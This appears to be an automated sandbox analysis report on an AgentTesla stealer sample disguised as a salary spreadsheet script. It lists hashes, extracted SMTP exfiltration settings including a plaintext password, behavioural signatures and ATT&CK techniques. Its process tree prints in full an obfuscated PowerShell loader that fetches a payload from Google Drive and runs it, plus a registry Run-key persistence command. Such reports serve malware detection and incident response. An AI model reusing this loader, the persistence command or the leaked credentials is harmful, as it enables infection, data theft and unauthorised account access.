agenttesla | 4de05aee1a99ea577443c742aa6c1ce05e88c3c716c234f1d1598c2e648486da

General

Target

Salary List.xls.vbs
Size

1.1MB
MD5

895c0c58f0e05a6b30b1b1956e76c16b
SHA1

e56fc2959189ec7a520cbc17703ea3aa4550253c
SHA256

4de05aee1a99ea577443c742aa6c1ce05e88c3c716c234f1d1598c2e648486da
SHA512

51ee9a36c1f8b3a1c4dc17d8b823da8abcc78002fe4c81ae22010107f8f5536b7dde7217e662bc5feed85305629fc1b730e7cc25cd01ab83bf8c5b69c44faeb8
SSDEEP

12288:j31cvBzbU01qal638iNX3iTMgmuYtWN/ZgMiQPeRj+:jYz64+2Sj+

Score

10^/10

agenttesla keylogger persistence spyware stealer trojan

Malware Config

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
mail.myhydropowered.com
Port:
587
Username:
[email protected]
Password:
JAyhAGxxVOdW6FW
Email To:
[email protected]

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	908	powershell.exe
7	908	powershell.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Run\Startup key = "%Boligforeningers% -w 1 $Fllesbetegnelser=(Get-ItemProperty -Path 'HKCU:\\Kneepads\\').Oocystis;%Boligforeningers% ($Fllesbetegnelser)"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Run\DtcHF = "C:\\Users\\Admin\\AppData\\Roaming\\DtcHF\\DtcHF.exe"	wab.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
4	drive.google.com
5	drive.google.com
9	drive.google.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
13	api.ipify.org
14	api.ipify.org
15	ip-api.com

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
2584	wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
2584	wab.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
2532	reg.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
908	powershell.exe
2584	wab.exe
2584	wab.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	908	powershell.exe
Token: SeDebugPrivilege	2584	wab.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 1876 wrote to memory of 908	1876	WScript.exe	28
PID 1876 wrote to memory of 908	1876	WScript.exe	28
PID 1876 wrote to memory of 908	1876	WScript.exe	28
PID 908 wrote to memory of 1936	908	powershell.exe	30
PID 908 wrote to memory of 1936	908	powershell.exe	30
PID 908 wrote to memory of 1936	908	powershell.exe	30
PID 908 wrote to memory of 2172	908	powershell.exe	32
PID 908 wrote to memory of 2172	908	powershell.exe	32
PID 908 wrote to memory of 2172	908	powershell.exe	32
PID 908 wrote to memory of 2172	908	powershell.exe	32
PID 2584 wrote to memory of 2396	2584	wab.exe	35
PID 2584 wrote to memory of 2396	2584	wab.exe	35
PID 2584 wrote to memory of 2396	2584	wab.exe	35
PID 2584 wrote to memory of 2396	2584	wab.exe	35
PID 2396 wrote to memory of 2532	2396	cmd.exe	37
PID 2396 wrote to memory of 2532	2396	cmd.exe	37
PID 2396 wrote to memory of 2532	2396	cmd.exe	37
PID 2396 wrote to memory of 2532	2396	cmd.exe	37

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Salary List.xls.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1876
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Rekruttere='S';$Rekruttere+='ubs';$Rekruttere+='tri';$slanterne = 1;$Rekruttere+='ng';Function Auricyanhydric($Pandaric){$Microcytic=$Pandaric.Length-$slanterne;For( $Eurobarometer=7;$Eurobarometer -lt $Microcytic;$Eurobarometer+=8){$Semuncia+=$Pandaric.$Rekruttere.Invoke( $Eurobarometer, $slanterne);}$Semuncia;}function Forskerholdene($Countergambit){ . ($Accumber) ($Countergambit);}$Spartina=Auricyanhydric 'Ettals M Holo,hoW ooplaz CherimiLreproglCapricolPincustaDeliriu/Burnyko5 Chutzp.Micropa0Blephar pumpkin(Nonc nsWTrihal.iLappingnGensta d UdvikloNlnyhedw Horn.esAdenine RespektNGrafikmT.oshsca selvcen1Forsynd0Handels.Dvalent0Al,erta; Motetu K ingesWPectiniiApotheonTistyks6Grum ab4Tegnese;Genial. OmfavnexCeliosc6Bluster4Crispie;drjed.r Enkroner MorgenvGgeblom:E,ulger1Con,hom2 ,apper1Sphy ni.Forhjet0Filt.rp)Underta FremtoGTur,aboeEndotrocG.usgrak NotendoLittesa/Deq.een2Maniske0 To.vta1Suppler0 nordst0,ubjekt1Ekspone0Sindsop1Oranunp DetekteF Noncrii akkedrrUnder de EnkeltfLogiskeoKviltnixFrifind/Beskriv1Prefixi2 Stavri1Fremb,d.Ant,sep0Velform ';$Dilatableness=Auricyanhydric ',eltlngUTechnicsOpsigeledrivh sr ncleri- paulseA edeliggSnvledeeTjenestn DatabatAkademi ';$Isalena=Auricyanhydric 'BlusserhSkyggertViolonctUnretropAndelslsC,ttonw:Re rutt/ Dalbyd/ VejrsadVildtbirAn.enbeiFeltprsv Encradeschf.re.Magtensg Cyk,ltoSafterno ActivagBlowh,lledinb.re Superv.Demifusc Al,neao enialm Hastat/No,evocuSuperimcQuick e?Salatste moralxU garnfpMacrop oGastrotrTrmlksftRosolic=T.stubbd Phobiso CirkelwKonsis nAwmbriel AnorgaoMinerneaEn,gtendReducta& MelocoiSvin.ridSprogta=Skalspi1 AmourssVacil.aPRecapitJEvange,TVitialuE L.dsidOCly eniNUnprevev B.rgerCKonusidgTaboredXRacerenKasco.aruIncalveBN,ocubiqMisha toR gulatz LgehonoSydslesP,lyantsc HvervexUproot,WAffdtesxCameralhKulturpU.rswaywPReluctso LmlensKMuscled4EngembiUFormuliZSl vebok Optrk, ';$Modtagelsesdatoers=Auricyanhydric 'Ziriani>Indrapp ';$Accumber=Auricyanhydric ' Per eriSkrmbileLytteapx Stormn ';$Sankthansaftnen187='Amargosos';$Hofternes = Auricyanhydric '.natosaeRattingcOrdflomh.sarevnoAandsvr Fralgge%Spil.emaTabbillppizzabap Aandigdabbedisa Tv,ngstBundskja.haeosp%Medvide\ ToddyeU Fyrr md Unve.eeAnkringnKitchpobSchi lio Pebe mrHvervetdTuppe,isVolita mKlov.eroTitalsltProvinsoafsyrburVarsomh.SnablenVNon.isceSudanerj Forel, Antil,t&Udvi kn& Cel,do GrousineClifforcMenstruhillianno ,ndert Unmixdytpatr,ar ';Forskerholdene (Auricyanhydric 'Accordi$BaraitagVirensjltren ieoBe.rdedb .sotroaAntilialArdoise:AstrophHBaroucheGransknt,lyawayzBelyingeDisscepnUnbluesskogalsk=Krympes(Borgerrc.fretnimProduktd.uvaere Tykning/Rein.ercReading Tilkbet$Uner.tiHGlycoluoAlligatfFallitbtTransece varmemrCawst.rnliberaleIn bilds,upaiau)Lanknes ');Forskerholdene (Auricyanhydric 'Mourns,$SkrivergSpiritulAst,nykoAccelerbC.eeredaklaringlIngust :cephaloO.eskripr WoodmagMononucaDesmerenFon.anei Tilbygs rndseaS.atshatHestek iKaolinsoLusketbnWildishsD.gsmaafSolsortoBoloismrLukewarmsm ltereDissembrplasmopnS.ersbyeRemortgs Fdsels=viftenk$SelvantIZ.oplassBisp.gaaIndkomslSpl,nteeUnre lenNinetyfa Une.fa.Merud isProstrapBalzar l,onkeyhidakoitst monami(Turtosa$PhthaleMPjalteroPhotosedAlvildst,nfundiaUnshr bgDwtan.eepromisclFremtvusBaelteseJolleymsSwellerdErhvervaFlirtpotOppo tuoCykelhae ,edhngrListesksMirijan)Fe tose ');$Isalena=$Organisationsformernes[0];$begets= (Auricyanhydric 'Justerv$Tetra rgFjeldsbl SkrddeoSubul.fbTrianguaUniflaglDatagru:masseprSCylindrl Dinaspi SlagtegKn,ldgah Pegam,tNonprudeisln.insvietnamt,tikker=.ntifonNBalkavaeP.lotsywFr,itil- Skin.fO NedskrbMindretjPlatodeeFodboldcInternetpneuma, PencilS translyGen.dtesLasarwotDronerseUredinemBlo,ste.DokumenNIntercoeGastrittTribula.SpaantaWStikline Smk.edbBen dicCPostphtlT strukiRectif e Ca,tionUla lart');$begets+=$Hetzens[1];Forskerholdene ($begets);Forskerholdene (Auricyanhydric ' Ko.dpr$Und rseSIntabullMusco,iiowe mang IntoxihOmvisentNonabraeAfrustnsLighedstIndikat.Jol erhH Sulfide Stive,aGenfremd UndereeF,otwayrRedirigssisterl[B.mrkni$ haunchDAe.uianiHigdo,llAerometaBorgerhtBa.projaUnfernlbGnomonil InsinueZebrablnCon opteIn,estesCommunisForblff]Afstikk=Wrainst$CenterlSAbdic,tptopchefa HoggyarDrouthitUmbrineiZoospgin,quirinaRomeite ');$alkoholikeren=Auricyanhydric 'informa$SlyngboS ultislC,nterhiIllustrgReshinehbygget,t EskimoeSmilaxes,ovbefatDissymm.SabrephD DokumeoGttforswSaalskanSljdenslTepott,o Na velaRealle.d E.hoisF Gains,iFarmhoulDaarekieLan.zon(Hor,oni$AntndelIKreditgsA,kerneaKommandl Webbieeabsolven VindtraKrimina,Imbalme$SikkerhnAbhorsaiBrn,vrntDipleurtAzotisie DeerhonProsomadCommentePaskvild S rmsteUnr.joilCapitol)Chlamyd ';$nittendedel=$Hetzens[0];Forskerholdene (Auricyanhydric 'Sany ko$TankanggNonneorl ubpharoslg.sprbEfter,aaHemme,ilG stero:I dkoblP FlaatsoBasi,idp DittemuTornirilHypother.nrealit Fuldst=G.ptisk(arbithfTKmpehjjefratruksAntagont anstte-OophoroP .appyraTillidstJaunbakhVestenv Ammunit$Woodbinn ldgreri O,egratPet,ysttIngmarse TransanLegsstidUnc nceevitessedDemarkseSpellinl famili)Filtrat ');while (!$Populrt) {Forskerholdene (Auricyanhydric 'O sedeu$Sylvag.gSvinghjl BurhnsoAnlgsa,b,etragra FakturlU verid:Weir,neSUr,tfrdc InkleseIndv,innBetalinaVagtannrTissemaiUdradersSkydelokTe ebri=svededr$Chancr tDataopsrRygepauu forste moundw ') ;Forskerholdene $alkoholikeren;Forskerholdene (Auricyanhydric 'BiavlerSUnitr.st nutcera pc,reirskrivestnavaho.-DrooptpSSkarnbol Bund,peHasheeseTrykkedpModef,l palisad4 Reg af ');Forskerholdene (Auricyanhydric 'Fyrsteh$Prefi,ugNontolelShaled.oSkjtekobHyposthaPat.oullRegimen:KlimatoPEksorbioC,arbocpRet.stauTrio.erlPopelyprTattleft Deltal=b,astoc(WhoduniTstyringeBrugtvosAb,orbatHusaren-BykernePMilj ttaDepictitSlu edehKrok.se G.veren$Ema lvonOrth cei StigmatTrveskrtUnaddede AdmiranDannebrd synseveHae athdSjoveree ejlslul vagin)Bogsurn ') ;Forskerholdene (Auricyanhydric 'vo.nman$ ubeh,fgOvera dlFilamenoMyosin,b,udevoraAscri,tl Embiot:Avan,gak.eurololPersonsuFormicadBru.secr alecheeDominikd,dendrseAccelers Kronpr=Abjects$StinkskgNige,ialWheeplioPrdikedb El ctratap,ttalOprinde:ZoolithN Ka erssSvingkatForle.eb Parodoe Livsted Un kkesTrommestTilm.ld+Torech +Luxk oa% Tobakk$BrakestO traykirsondringAmagermaSortebrnConidiui StdpudsAmbula.a Hi,hhatNavigatiEndot,eoLookywanIspindesSkolerafEfterudoOptagetrInter rmSecreteePolyp,ar OpvasknMo alpreCo partsSynskre. overlacFdrela,oJuris euNo.dmarn Udsalgt veteri ') ;$Isalena=$Organisationsformernes[$kludredes];}$Entosphenal=336951;$Storrums=29963;Forskerholdene (Auricyanhydric 'Voltmet$shfalmegFancifulRo,antioFrostklbBochu haInsolvel Affyri:Taks.noFarbejdslAngelicy.lurrinnSa,mensdoffsetteFluefanrtriska. S,apsu=Centerv UnpaupeG dis cieBestrewtUnslyma-Keg,estCSeptocoo DigitinleannestLandskaeTab.erinC.ntraltviewpoi Filator$lagdelinBeadrowiStrmerbtRullematD.cryoceOverir nUnvi.iodEm,owereBrne ykd AsympteBudgetmlLe,copl ');Forskerholdene (Auricyanhydric 'Ligfald$ToldeglgKlassislChiti.ooLen itubUk,alifaVeggierlBrmmer,:Da,elsmMTransyldNarkosed KnoxviiNettiesn Udpi.tg Se,rnesSk iveb Acanth= Blood Shog.p[ monophSKongresy ForsvasOve.skytDj,elske preautmFumete.. KntrenCindkraeo Tse idn ejevrvOpsgnineHaylagerPupemottCh,nger]Forward:Ordkomb:UdbasunFamtspolrContermoT,rapeumMuffi,hBVordingaConn tisEneta.ee Anlgsb6 Afdeli4Unmoat.SRitterstFlymekarBlaguebi Andr,gnDemiha.gJant.rp(transve$CunjevoFH,permnlAanderfyKat lyzn Stru,td BogtryeOuttalkrUtilfre) Ditet ');Forskerholdene (Auricyanhydric 'Reverse$embryopgIntertrlStrblinoSaft,olbCarpoidaPhoronilbaraltv:T,kerneRDaw sderHa,cucalDramatigTelesiagDemobileFul,ends Verbif Stofpri= Skille A,onine[gnomonfSUdlud.iy Simults SaudiatGa,troceSpidstemTempest.Hir,ellTFeru.ebeRkeb,skxReli,blt,elefon.LavningEFrygisknLegemulc SpherioDebarbadEpic leiTredjepnAfklippgNonvi.u]Frightl: Asepto:brachyaAUdklassS,olioviC BornylIChaf suIBewired.DutcherGArbej.seSindstitCastlewSToptekstTajgaenrVand aniJul kaknRaced sgGulfwee(Gnathon$AnhydreM SomnoldBulensad KastreiEndothrnprisonlgFarsotes Outwhi)Vest.ns ');Forskerholdene (Auricyanhydric ' .agtso$YogasangFormildl Str,ndoDermostb Gya.una B.ntuelDra ber:IncumbeHSiretlea.emelytlglsningvStraffelNonfalleD.umaslgHelnodesparce,erLode,srealeins,sSi elinuLe ningl,rosscutObolbliaIsl mistOvergrasW,tjarn=Sivathe$AmassetRForulykrSam,undlTyr.nneg Ho tesg KlumreeNiftinesInorna..InfragesPrferenu rembrbHela,tosUdgan.stRustederBhlamdei MediusnoctosylgDe,ylen(Overfou$SenilkoE ObituanMisfornt L ndedoNetma.esEstaminpVikingehaphrodie dr,matnPizzaeraArticullHeterop,Befugte$BalanceS Semi.at P eudaoKlistrirHardhe,rOffloadumorphopmTilvkstsVa.dtrd)Fravri, ');Forskerholdene $Halvlegsresultats;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:908
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Udenbordsmotor.Vej && echo t"
    3⤵
    PID:1936
- - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Rekruttere='S';$Rekruttere+='ubs';$Rekruttere+='tri';$slanterne = 1;$Rekruttere+='ng';Function Auricyanhydric($Pandaric){$Microcytic=$Pandaric.Length-$slanterne;For( $Eurobarometer=7;$Eurobarometer -lt $Microcytic;$Eurobarometer+=8){$Semuncia+=$Pandaric.$Rekruttere.Invoke( $Eurobarometer, $slanterne);}$Semuncia;}function Forskerholdene($Countergambit){ . ($Accumber) ($Countergambit);}$Spartina=Auricyanhydric 'Ettals M Holo,hoW ooplaz CherimiLreproglCapricolPincustaDeliriu/Burnyko5 Chutzp.Micropa0Blephar pumpkin(Nonc nsWTrihal.iLappingnGensta d UdvikloNlnyhedw Horn.esAdenine RespektNGrafikmT.oshsca selvcen1Forsynd0Handels.Dvalent0Al,erta; Motetu K ingesWPectiniiApotheonTistyks6Grum ab4Tegnese;Genial. OmfavnexCeliosc6Bluster4Crispie;drjed.r Enkroner MorgenvGgeblom:E,ulger1Con,hom2 ,apper1Sphy ni.Forhjet0Filt.rp)Underta FremtoGTur,aboeEndotrocG.usgrak NotendoLittesa/Deq.een2Maniske0 To.vta1Suppler0 nordst0,ubjekt1Ekspone0Sindsop1Oranunp DetekteF Noncrii akkedrrUnder de EnkeltfLogiskeoKviltnixFrifind/Beskriv1Prefixi2 Stavri1Fremb,d.Ant,sep0Velform ';$Dilatableness=Auricyanhydric ',eltlngUTechnicsOpsigeledrivh sr ncleri- paulseA edeliggSnvledeeTjenestn DatabatAkademi ';$Isalena=Auricyanhydric 'BlusserhSkyggertViolonctUnretropAndelslsC,ttonw:Re rutt/ Dalbyd/ VejrsadVildtbirAn.enbeiFeltprsv Encradeschf.re.Magtensg Cyk,ltoSafterno ActivagBlowh,lledinb.re Superv.Demifusc Al,neao enialm Hastat/No,evocuSuperimcQuick e?Salatste moralxU garnfpMacrop oGastrotrTrmlksftRosolic=T.stubbd Phobiso CirkelwKonsis nAwmbriel AnorgaoMinerneaEn,gtendReducta& MelocoiSvin.ridSprogta=Skalspi1 AmourssVacil.aPRecapitJEvange,TVitialuE L.dsidOCly eniNUnprevev B.rgerCKonusidgTaboredXRacerenKasco.aruIncalveBN,ocubiqMisha toR gulatz LgehonoSydslesP,lyantsc HvervexUproot,WAffdtesxCameralhKulturpU.rswaywPReluctso LmlensKMuscled4EngembiUFormuliZSl vebok Optrk, ';$Modtagelsesdatoers=Auricyanhydric 'Ziriani>Indrapp ';$Accumber=Auricyanhydric ' Per eriSkrmbileLytteapx Stormn ';$Sankthansaftnen187='Amargosos';$Hofternes = Auricyanhydric '.natosaeRattingcOrdflomh.sarevnoAandsvr Fralgge%Spil.emaTabbillppizzabap Aandigdabbedisa Tv,ngstBundskja.haeosp%Medvide\ ToddyeU Fyrr md Unve.eeAnkringnKitchpobSchi lio Pebe mrHvervetdTuppe,isVolita mKlov.eroTitalsltProvinsoafsyrburVarsomh.SnablenVNon.isceSudanerj Forel, Antil,t&Udvi kn& Cel,do GrousineClifforcMenstruhillianno ,ndert Unmixdytpatr,ar ';Forskerholdene (Auricyanhydric 'Accordi$BaraitagVirensjltren ieoBe.rdedb .sotroaAntilialArdoise:AstrophHBaroucheGransknt,lyawayzBelyingeDisscepnUnbluesskogalsk=Krympes(Borgerrc.fretnimProduktd.uvaere Tykning/Rein.ercReading Tilkbet$Uner.tiHGlycoluoAlligatfFallitbtTransece varmemrCawst.rnliberaleIn bilds,upaiau)Lanknes ');Forskerholdene (Auricyanhydric 'Mourns,$SkrivergSpiritulAst,nykoAccelerbC.eeredaklaringlIngust :cephaloO.eskripr WoodmagMononucaDesmerenFon.anei Tilbygs rndseaS.atshatHestek iKaolinsoLusketbnWildishsD.gsmaafSolsortoBoloismrLukewarmsm ltereDissembrplasmopnS.ersbyeRemortgs Fdsels=viftenk$SelvantIZ.oplassBisp.gaaIndkomslSpl,nteeUnre lenNinetyfa Une.fa.Merud isProstrapBalzar l,onkeyhidakoitst monami(Turtosa$PhthaleMPjalteroPhotosedAlvildst,nfundiaUnshr bgDwtan.eepromisclFremtvusBaelteseJolleymsSwellerdErhvervaFlirtpotOppo tuoCykelhae ,edhngrListesksMirijan)Fe tose ');$Isalena=$Organisationsformernes[0];$begets= (Auricyanhydric 'Justerv$Tetra rgFjeldsbl SkrddeoSubul.fbTrianguaUniflaglDatagru:masseprSCylindrl Dinaspi SlagtegKn,ldgah Pegam,tNonprudeisln.insvietnamt,tikker=.ntifonNBalkavaeP.lotsywFr,itil- Skin.fO NedskrbMindretjPlatodeeFodboldcInternetpneuma, PencilS translyGen.dtesLasarwotDronerseUredinemBlo,ste.DokumenNIntercoeGastrittTribula.SpaantaWStikline Smk.edbBen dicCPostphtlT strukiRectif e Ca,tionUla lart');$begets+=$Hetzens[1];Forskerholdene ($begets);Forskerholdene (Auricyanhydric ' Ko.dpr$Und rseSIntabullMusco,iiowe mang IntoxihOmvisentNonabraeAfrustnsLighedstIndikat.Jol erhH Sulfide Stive,aGenfremd UndereeF,otwayrRedirigssisterl[B.mrkni$ haunchDAe.uianiHigdo,llAerometaBorgerhtBa.projaUnfernlbGnomonil InsinueZebrablnCon opteIn,estesCommunisForblff]Afstikk=Wrainst$CenterlSAbdic,tptopchefa HoggyarDrouthitUmbrineiZoospgin,quirinaRomeite ');$alkoholikeren=Auricyanhydric 'informa$SlyngboS ultislC,nterhiIllustrgReshinehbygget,t EskimoeSmilaxes,ovbefatDissymm.SabrephD DokumeoGttforswSaalskanSljdenslTepott,o Na velaRealle.d E.hoisF Gains,iFarmhoulDaarekieLan.zon(Hor,oni$AntndelIKreditgsA,kerneaKommandl Webbieeabsolven VindtraKrimina,Imbalme$SikkerhnAbhorsaiBrn,vrntDipleurtAzotisie DeerhonProsomadCommentePaskvild S rmsteUnr.joilCapitol)Chlamyd ';$nittendedel=$Hetzens[0];Forskerholdene (Auricyanhydric 'Sany ko$TankanggNonneorl ubpharoslg.sprbEfter,aaHemme,ilG stero:I dkoblP FlaatsoBasi,idp DittemuTornirilHypother.nrealit Fuldst=G.ptisk(arbithfTKmpehjjefratruksAntagont anstte-OophoroP .appyraTillidstJaunbakhVestenv Ammunit$Woodbinn ldgreri O,egratPet,ysttIngmarse TransanLegsstidUnc nceevitessedDemarkseSpellinl famili)Filtrat ');while (!$Populrt) {Forskerholdene (Auricyanhydric 'O sedeu$Sylvag.gSvinghjl BurhnsoAnlgsa,b,etragra FakturlU verid:Weir,neSUr,tfrdc InkleseIndv,innBetalinaVagtannrTissemaiUdradersSkydelokTe ebri=svededr$Chancr tDataopsrRygepauu forste moundw ') ;Forskerholdene $alkoholikeren;Forskerholdene (Auricyanhydric 'BiavlerSUnitr.st nutcera pc,reirskrivestnavaho.-DrooptpSSkarnbol Bund,peHasheeseTrykkedpModef,l palisad4 Reg af ');Forskerholdene (Auricyanhydric 'Fyrsteh$Prefi,ugNontolelShaled.oSkjtekobHyposthaPat.oullRegimen:KlimatoPEksorbioC,arbocpRet.stauTrio.erlPopelyprTattleft Deltal=b,astoc(WhoduniTstyringeBrugtvosAb,orbatHusaren-BykernePMilj ttaDepictitSlu edehKrok.se G.veren$Ema lvonOrth cei StigmatTrveskrtUnaddede AdmiranDannebrd synseveHae athdSjoveree ejlslul vagin)Bogsurn ') ;Forskerholdene (Auricyanhydric 'vo.nman$ ubeh,fgOvera dlFilamenoMyosin,b,udevoraAscri,tl Embiot:Avan,gak.eurololPersonsuFormicadBru.secr alecheeDominikd,dendrseAccelers Kronpr=Abjects$StinkskgNige,ialWheeplioPrdikedb El ctratap,ttalOprinde:ZoolithN Ka erssSvingkatForle.eb Parodoe Livsted Un kkesTrommestTilm.ld+Torech +Luxk oa% Tobakk$BrakestO traykirsondringAmagermaSortebrnConidiui StdpudsAmbula.a Hi,hhatNavigatiEndot,eoLookywanIspindesSkolerafEfterudoOptagetrInter rmSecreteePolyp,ar OpvasknMo alpreCo partsSynskre. overlacFdrela,oJuris euNo.dmarn Udsalgt veteri ') ;$Isalena=$Organisationsformernes[$kludredes];}$Entosphenal=336951;$Storrums=29963;Forskerholdene (Auricyanhydric 'Voltmet$shfalmegFancifulRo,antioFrostklbBochu haInsolvel Affyri:Taks.noFarbejdslAngelicy.lurrinnSa,mensdoffsetteFluefanrtriska. S,apsu=Centerv UnpaupeG dis cieBestrewtUnslyma-Keg,estCSeptocoo DigitinleannestLandskaeTab.erinC.ntraltviewpoi Filator$lagdelinBeadrowiStrmerbtRullematD.cryoceOverir nUnvi.iodEm,owereBrne ykd AsympteBudgetmlLe,copl ');Forskerholdene (Auricyanhydric 'Ligfald$ToldeglgKlassislChiti.ooLen itubUk,alifaVeggierlBrmmer,:Da,elsmMTransyldNarkosed KnoxviiNettiesn Udpi.tg Se,rnesSk iveb Acanth= Blood Shog.p[ monophSKongresy ForsvasOve.skytDj,elske preautmFumete.. KntrenCindkraeo Tse idn ejevrvOpsgnineHaylagerPupemottCh,nger]Forward:Ordkomb:UdbasunFamtspolrContermoT,rapeumMuffi,hBVordingaConn tisEneta.ee Anlgsb6 Afdeli4Unmoat.SRitterstFlymekarBlaguebi Andr,gnDemiha.gJant.rp(transve$CunjevoFH,permnlAanderfyKat lyzn Stru,td BogtryeOuttalkrUtilfre) Ditet ');Forskerholdene (Auricyanhydric 'Reverse$embryopgIntertrlStrblinoSaft,olbCarpoidaPhoronilbaraltv:T,kerneRDaw sderHa,cucalDramatigTelesiagDemobileFul,ends Verbif Stofpri= Skille A,onine[gnomonfSUdlud.iy Simults SaudiatGa,troceSpidstemTempest.Hir,ellTFeru.ebeRkeb,skxReli,blt,elefon.LavningEFrygisknLegemulc SpherioDebarbadEpic leiTredjepnAfklippgNonvi.u]Frightl: Asepto:brachyaAUdklassS,olioviC BornylIChaf suIBewired.DutcherGArbej.seSindstitCastlewSToptekstTajgaenrVand aniJul kaknRaced sgGulfwee(Gnathon$AnhydreM SomnoldBulensad KastreiEndothrnprisonlgFarsotes Outwhi)Vest.ns ');Forskerholdene (Auricyanhydric ' .agtso$YogasangFormildl Str,ndoDermostb Gya.una B.ntuelDra ber:IncumbeHSiretlea.emelytlglsningvStraffelNonfalleD.umaslgHelnodesparce,erLode,srealeins,sSi elinuLe ningl,rosscutObolbliaIsl mistOvergrasW,tjarn=Sivathe$AmassetRForulykrSam,undlTyr.nneg Ho tesg KlumreeNiftinesInorna..InfragesPrferenu rembrbHela,tosUdgan.stRustederBhlamdei MediusnoctosylgDe,ylen(Overfou$SenilkoE ObituanMisfornt L ndedoNetma.esEstaminpVikingehaphrodie dr,matnPizzaeraArticullHeterop,Befugte$BalanceS Semi.at P eudaoKlistrirHardhe,rOffloadumorphopmTilvkstsVa.dtrd)Fravri, ');Forskerholdene $Halvlegsresultats;"
    3⤵
    PID:2172
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Udenbordsmotor.Vej && echo t"
      4⤵
      PID:2724
  - - C:\Program Files (x86)\windows mail\wab.exe
      "C:\Program Files (x86)\windows mail\wab.exe"
      4⤵
      Adds Run key to start application
      Suspicious use of NtCreateThreadExHideFromDebugger
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2584
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Boligforeningers% -w 1 $Fllesbetegnelser=(Get-ItemProperty -Path 'HKCU:\Kneepads\').Oocystis;%Boligforeningers% ($Fllesbetegnelser)"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2396
      - C:\Windows\SysWOW64\reg.exe
        
        REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Boligforeningers% -w 1 $Fllesbetegnelser=(Get-ItemProperty -Path 'HKCU:\Kneepads\').Oocystis;%Boligforeningers% ($Fllesbetegnelser)"
        6⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:2532

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Parilicium.txt

Filesize
527B

MD5
7b6b08a2cb17e8f70adc35b82c98c950

SHA1
0209be69b5ee7107a4b4c7b4465e83ba2981ae95

SHA256
f52f52941b12be43379160be74d695d3866c1a5b658d5fb67f0e7dfca83d4dfd

SHA512
55fffba6bd12b26f7732007631bde36cb544aabf8466ca64829b64fa71afe4290391eee0c07b71a3e80799a7f115311d7c64f112b56879b7e855c8f5d8466754

Download Submit
C:\Users\Admin\AppData\Local\Temp\Parilicium.txt

Filesize
6KB

MD5
2632b1daa8277e83ca6e0bf89bd94d3e

SHA1
7d3507c8d9ee91a0b1f8174ff03c5a614228f4fd

SHA256
b9039fa8099e8c07d2fa74788fff0ae4438ab9ded91fc06fc1b988319567fe24

SHA512
afeb48066e5f267f8410a199f86d84d003d6f9cc3939ac556f7b2ab980bf6ea97cbce8a3e16d3039d02dc1c7e11542188c8b8c2865de5d8ca4bf46f8af2ab5bf

Download Submit
C:\Users\Admin\AppData\Local\Temp\Parilicium.txt

Filesize
153B

MD5
77646fd12a6f8467c7807fcdf2f4d7d9

SHA1
46e0f8a46f01fd486cc239bf7f96f923e6b57946

SHA256
a35c7d762434bae7e29d18907bf4afe125c0c78883671eccc024340eb2ce9c3a

SHA512
156143a7d8396fcbe25d079fb0d9ca205f76d0d14bf643cfb08fd912eb45705244a97b1defd573aa4c5ecd5355dcbf749c0594b853aceb6822ffac3796170151

Download Submit
memory/908-339-0x000007FEF5820000-0x000007FEF61BD000-memory.dmp

Filesize
9.6MB

Download
memory/908-337-0x000000001B550000-0x000000001B832000-memory.dmp

Filesize
2.9MB

Download
memory/908-338-0x0000000001FD0000-0x0000000001FD8000-memory.dmp

Filesize
32KB

Download
memory/908-406-0x000007FEF5820000-0x000007FEF61BD000-memory.dmp

Filesize
9.6MB

Download
